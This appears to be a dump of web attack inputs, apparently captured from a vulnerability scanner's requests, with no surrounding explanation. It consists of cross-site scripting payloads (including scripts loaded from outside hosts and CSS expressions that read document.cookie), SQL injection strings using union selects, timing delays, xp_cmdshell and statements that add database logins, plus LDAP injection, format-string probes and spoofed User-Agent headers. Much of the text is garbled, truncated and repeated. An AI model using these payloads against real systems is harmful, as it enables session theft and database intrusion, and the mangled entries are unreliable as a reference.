perl -e 'print "&<SCR\0IPT2;alert& #40;"XSS" )</SCR\ 0IP

perl -e 'print "&<SCR\0IPT2;alert& #40;"XSS" )</SCR\ 0IP

perl -e 'print "alert("XSS")" ;' > out

perl -e 'print "alert("XSS")" ;' > out

qwertyqwop2

style=color: expression(ale rt(0));" a="

style=color: expression(ale rt(0));" a="

style=color: expression(ale rt(0));" a="

style=color: expression(ale rt(0));" a="

uni/**/on sel/**/ect

uni/**/on sel/**/ect

User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)

User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727

User-Agent: Mozilla/5.0 (SymbianOS/9.2 ; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2 .0 Config

User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/52 8.5+ (KH

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.27.1 (KHTML, like Gecko)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.19 (KHTML, like Gecko) C

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.cen

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0

User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14

User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)

User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727

User-Agent: Mozilla/5.0 (SymbianOS/9.2 ; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2 .0 Config

User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/52 8.5+ (KH

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.27.1 (KHTML, like Gecko)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.19 (KHTML, like Gecko) C

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.cen

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0

User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14

User-Agent: Wget/1.8.2

User-Agent: Wget/1.8.2

width: expression((wi ndow.r==documen t.cookie)?'':al ert(r=document. cookie))

width: expression((wi ndow.r==documen t.cookie)?'':al ert(r=document. cookie))

width: expression((wi ndow.r==documen t.cookie)?'':al ert(r=document. cookie))

width: expression((wi ndow.r==documen t.cookie)?'':al ert(r=document. cookie))

with(document. parent )alert (1)

with(document. parent )alert (1)

x' and members.email is NULL; --

x' and members.email is NULL; --

x' and userid is NULL; --

x' and userid is NULL; --

XSS

XSS

XSS

XSS

XSS STYLE=xss:e/** /xpression(aler t('XSS'))>

XSS STYLE=xss:e/** /xpression(aler t('XSS'))>

XSS/*-*/STYLE=x ss:e/**/xpressi on(alert('XSS') )>

XSS/*-*/STYLE=x ss:e/**/xpressi on(alert('XSS') )>

y=alert;content [y](123)

y=alert;content [y](123)

]]>

]]>

` SRC="http://ha .ckers.org/xss. js">

` SRC="http://ha .ckers.org/xss. js">

`> alert(5)

`> alert(5)

Private photo albums

%08x

%p%p%p%p%p%p%p% p%p%p

<!--[i f gte IE 4]>; <SCRIPT>al ert('XSS'; );</SC

</TITLE 2;<SCRIPT>al ert("XSS"; );</SCRIPT&# 62;

<<SCRIPT>;al ert("XSS"; );/ /<</SCRIPT&# 62;

<BASE HREF=" javascript: alert('XSS' );/ /">

<BODY BACKGROUND= ;"javascrip t:alert(';XSS' );" >

<BR SIZE=" &{;aler t(';XSS' )};" ;>

<DIV STYLE=" ;background-ima ge: url(javascript&#5 8;alert0;'XSS' )

<DIV STYLE=" ;width:; expression(alert('XSS' )); ">

<HTML xmlns:xss& #62; <?import namespace= "xss" implementation ="ht

<IFRAME SRC="j avascript:a lert('XSS9; );" ></IFRAME&

<IMG DYNSRC=; 4;javascript 8;alert0;'XSS' );" >

<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " 

<IMG SRC="j avascript:a lert('XSS9; );" >

<IMG SRC="h ttp:/&# 47;www.thesitey ouareon.com/ ;somecommand.ph p?somevaria bl

<IMG SRC='v bscript8;msg box("XSS"; )'>

<IMG SRC="l ivescript:& #91;code]&# 34;>

<IMG SRC=javasc ript:alert& #40;" ;XSS&quot&# 59;)>

<IMG SRC="j av ascript8;al ert('XSS'; );" >

<IMG SRC="j av&5;x0A;ascript& #58;alert('XSS' );" >

<IMG SRC="j avascript:a lert('XSS9; )"

<LINK REL="s tylesheet" HREF=" http:/& #47;testsite.co m/xss.css&# 34

<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0;url=j avascript:a lert(&

<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0; URL=http&# 58;//&# 59;U

<META HTTP-EQUIV= ;"Link" Content1;&# 34;<http:7 ;/testsite. com/xs

<SCRIPT a="; 2;" SRC="h ttp:/&# 47;testsite.com /xss.js" ;>&

<SCRIPT a=";bla h" '' SRC="h ttp:/&# 47;testsite.com /xss.js&

<SCRIPT a=`; 2;` SRC="h ttp:/&# 47;testsite.com /xss.js" ;>&

<SCRIPT a="; 2;'2; 4; SRC="h ttp:/&# 47;testsite.com /xss.js&

<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js>;</;SCRIPT&# 62;

<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js

<SCRIPT/XS S SRC="h ttp:/&# 47;testsite.com /xss.js" ;><;/SCRIP

<SCRIPT>a& #61;/XSS 7; alert(a.source) </SCRIPT&# 62;

<STYLE TYPE=" text/javasc ript">a lert('XSS9; );</STY

<STYLE type=" text/css 4;>BODY 3;background 8;url("javascri pt:

<TABLE BACKGROUND= ;"javascrip t:alert(';XSS' )"> </TABLE&

<XML ID=4;xs s">;<I2;<B><IMG SRC="j avas<!-- --&#

<XSS STYLE=" ;xss:expres sion(alert('XSS9; ))" >

<XSS STYLE=" ;behavior: url(http:7 ;/testsite. com/xss.htc );&

' or 1=1 --

' union (select NULL, (select @@version)) --

' union (select NULL, NULL, NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --

'; exec master..xp cmd shell 'ping 10.10.1.2'--

'; if not((select serverproperty ('isintegrateds ecurityonly')) 1) waitfor delay '0:0:2' --

'; if not(select system user) 'sa' waitfor delay '0:0:2' --

'; if not(substring( (select @@version),25, 1) 0) waitfor delay '0:0:2' --

'; if not(substring( (select @@version),25, 1) 8) waitfor delay '0:0:2' --

*(|(objectclass =*))

*)(uid=*))(|(ui d=*

1 and user name() = 'dbo'

1'1

create user name identified by pass123 temporary tablespace temp default tablespace users;

exec sp addlogin 'name' , 'password'

insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass 123'))

insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65)

nnosauzu%%20n

nnosauzu%%20s

nnosauzu%.2049d

nnosauzu%08x

nnosauzu%p%p%p% p%p%p%p%p%p%p

nnosauzu%s%p%x% d

nnosauzu%s%s%s% s

nnosauzu%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s

nnosauzu%x%x%x% x

nnosauzu<!--[i f gte IE 4]>; <SCRIPT>al ert('XSS'; );<

nnosauzu</TITLE 2;<SCRIPT>al ert("XSS"; );</SCRIPT&# 62;

nnosauzu<<SCRIPT>al ert("XSS"; );/ /<</SCRIPT&# 62;

nnosauzu<BASE HREF=" javascript: alert('XSS' );/ /">

nnosauzu<BODY BACKGROUND= ;"javascrip t:alert(';XSS' );" >

nnosauzu<BR SIZE=" &{;aler t(';XSS' )};" ;>

nnosauzu<DIV STYLE=" ;background-ima ge: url(javascript&#5 8;alert0;'XSS'

nnosauzu<DIV STYLE=" ;width:; expression(alert('XSS' )); "

nnosauzu<HTML xmlns:xss& #62; <?import namespace= "xss" implementation =

nnosauzu<IFRAME SRC="j avascript:a lert('XSS9; );" ></

nnosauzu<IMG SRC="j avascript:a lert('XSS9; );" >

nnosauzu<IMG DYNSRC=; 4;javascript 8;alert0;'XSS' );" >

nnosauzu<IMG SRC="h ttp:/&# 47;www.thesitey ouareon.com/ ;somecommand.ph p?som

nnosauzu<IMG SRC='v bscript8;msg box("XSS"; )'>

nnosauzu<IMG SRC="l ivescript:& #91;code]&# 34;>

nnosauzu<IMG SRC=javasc ript:alert& #40;" ;XSS&quot&# 59;)>

nnosauzu<IMG SRC="j av ascript8;al ert('XSS'; );" >

nnosauzu<IMG SRC="j av&5;x0A;ascript& #58;alert('XSS' );"

nnosauzu<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) &

nnosauzu<IMG SRC="j avascript:a lert('XSS9; )"

nnosauzu<LINK REL="s tylesheet" HREF=" http:/& #47;testsite.co m/xss

nnosauzu<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0;url=j avascript:a le

nnosauzu<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0; URL=http&# 58;/&#4

nnosauzu<META HTTP-EQUIV= ;"Link" Content1;&# 34;<http:7 ;/testsite. co

nnosauzu<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js>;</;SCRIPT&# 62;

nnosauzu<SCRIPT/XS S SRC="h ttp:/&# 47;testsite.com /xss.js" ;><;&#

nnosauzu<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js

nnosauzu<SCRIPT>a& #61;/XSS 7; alert(a.source) </SCRIPT&# 62;

nnosauzu<SCRIPT a="; 2;" SRC="h ttp:/&# 47;testsite.com /xss.js

nnosauzu<SCRIPT a=";bla h" '' SRC="h ttp:/&# 47;testsite.com /

nnosauzu<SCRIPT a=`; 2;` SRC="h ttp:/&# 47;testsite.com /xss.js

nnosauzu<SCRIPT a="; 2;'2; 4; SRC="h ttp:/&# 47;testsite.com /

nnosauzu<STYLE TYPE=" text/javasc ript">a lert('XSS9; );<

nnosauzu<STYLE type=" text/css 4;>BODY 3;background 8;url("javascr

nnosauzu<TABLE BACKGROUND= ;"javascrip t:alert(';XSS' )"> <

nnosauzu<XML ID=4;xs s">;<I2;<B><IMG SRC="j avas<&#33

nnosauzu<XSS STYLE=" ;xss:expres sion(alert('XSS9; ))" >

nnosauzu<XSS STYLE=" ;behavior: url(http:7 ;/testsite. com/xss.htc

nnosauzu' or 1=1 --

nnosauzu' or username is not NULL or username = '

nnosauzu' union (select NULL, (select @@version)) --

nnosauzu' union (select NULL, NULL, NULL, (select @@version)) --

nnosauzu' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --

nnosauzu'; exec master..xp cmd shell 'ping 10.10.1.2'--

nnosauzu'; if not(substring( (select @@version),25, 1) 0) waitfor delay '0:0:2' --

nnosauzu'; if not(substring( (select @@version),25, 1) 8) waitfor delay '0:0:2' --

nnosauzu'; if not(select system user) 'sa' waitfor delay '0:0:2' --

nnosauzu'; if not((select serverproperty ('isintegrateds ecurityonly')) 1) waitfor delay '0:0:2' --

nnosauzu*(|(obj ectclass=*))

nnosauzu*)(uid= *))(|(uid=*

nnosauzu0x100

nnosauzu0x10000

nnosauzu0x3fffffff

nnosauzu0x7fffffff

nnosauzu0xfffffffe

nnosauzu1 and user name() = 'dbo'

nnosauzu1 and user name() = 'dbo'

nnosauzu1 exec sp (or exec xp )

nnosauzu1 or 1=1

nnosauzu1 union all select 1,2,3,4,5,6,na me from sysobjects where xtype = 'u' --

nnosauzu1' and 1=(select count(*) from tablenames); --

nnosauzu1\'1

nnosauzucreate user name identified by pass123 temporary tablespace temp default tablespace users;

nnosauzuexec sp addlogin 'name' , 'password'

nnosauzuinsert into mysql.user (user, host, password) values ('name', 'localhost', password('pass 123

nnosauzuinsert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + cha

nnosauzumove

nnosauzuoptions

nnosauzuperl -e 'print "&<SCR\0IPT2;alert& #40;"XSS" )</SCR

nnosauzupost

nnosauzuproppat ch

nnosauzuput

nnosauzutrace

nnosauzuunlock

nnosauzuUser-Ag ent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)

nnosauzuUser-Ag ent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)

nnosauzuUser-Ag ent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1

nnosauzuUser-Ag ent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2

nnosauzuUser-Ag ent: Mozilla/5.0 (SymbianOS/9.2 ; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2 .

nnosauzuUser-Ag ent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/52

nnosauzuUser-Ag ent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.27.1 (KHTML, lik

nnosauzuUser-Ag ent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.19 (KHTML, like

nnosauzuUser-Ag ent: Wget/1.8.2

nnosauzuUser-Ag ent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))

nnosauzuUser-Ag ent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Fi

nnosauzuUser-Ag ent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1

nnosauzuUser-Ag ent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Fir

nnosauzuUser-Ag ent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0

nnosauzuXSS STYLE=xss:e/** /xpression(aler t('XSS'))>

nnosauzuXSS/*-* /STYLE=xss:e/** /xpression(aler t('XSS'))>

perl -e 'print "&<SCR\0IPT2;alert& #40;"XSS" )</SCR\ 0IP

sex

User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)

User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727

User-Agent: Mozilla/5.0 (SymbianOS/9.2 ; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2 .0 Config

User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/52 8.5+ (KH

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.27.1 (KHTML, like Gecko)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/52 5.19 (KHTML, like Gecko) C

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.cen

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0

User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14

User-Agent: Wget/1.8.2

XSS STYLE=xss:e/** /xpression(aler t('XSS'))>

XSS/*-*/STYLE=x ss:e/**/xpressi on(alert('XSS') )>